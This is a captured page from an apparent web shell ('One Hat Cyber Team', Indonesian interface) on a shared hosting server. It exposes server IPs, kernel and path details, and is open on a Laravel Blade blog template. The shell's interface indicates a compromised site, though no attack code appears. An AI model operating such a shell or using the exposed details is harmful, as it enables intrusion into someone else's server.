⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
smarbgfw
/
www
/
core
/
resources
/
views
/
front
/
Edit File: blog-details.blade.php
@extends("front.$version.layout") @section('pagename') - {{convertUtf8($blog->title)}} @endsection @section('meta-keywords', "$blog->meta_keywords") @section('meta-description', "$blog->meta_description") @section('breadcrumb-title', convertUtf8($bs->blog_details_title)) @section('breadcrumb-subtitle', strlen($blog->title) > 30 ? mb_substr($blog->title, 0, 30, 'utf-8') . '...' : $blog->title) @section('breadcrumb-link', __('Blog Details')) @section('content')
{{date('F d, Y', strtotime($blog->created_at))}} - {{__('BY')}} {{__('Admin')}}
{{convertUtf8($blog->title)}}
{!! replaceBaseUrl(convertUtf8($blog->content)) !!}
{{__('Share')}}
{{__('Tweet')}}
{{__('Linkedin')}}
@if ($blog->sidebar == 1)
{{__('Categories')}}
@foreach ($bcats as $key => $bcat)
{{convertUtf8($bcat->name)}}
@endforeach
{{__('Archives')}}
@foreach ($archives as $key => $archive) @php $myArr = explode('-', $archive->date); $monthNum = $myArr[0]; $dateObj = DateTime::createFromFormat('!m', $monthNum); $monthName = $dateObj->format('F'); @endphp
@php if (!empty($currentLang)) { $monthName = \Carbon\Carbon::parse($monthName)->locale("$currentLang->code"); $year = \Carbon\Carbon::parse($myArr[1])->locale("$currentLang->code"); } else { $monthName = \Carbon\Carbon::parse($monthName)->locale("en"); $year = \Carbon\Carbon::parse($myArr[1])->locale("en"); } $monthName = $monthName->translatedFormat('F'); $year = $year->translatedFormat('Y'); @endphp {{$monthName}} {{$year}}
@endforeach
{{__('SUBSCRIBE')}}
{{__('SUBSCRIBE FOR NEWSLETTER')}}
@csrf
@endif
@endsection @section('scripts') @if($bs->is_disqus == 1) {!! $bs->disqus_script !!} @endif @endsection
Simpan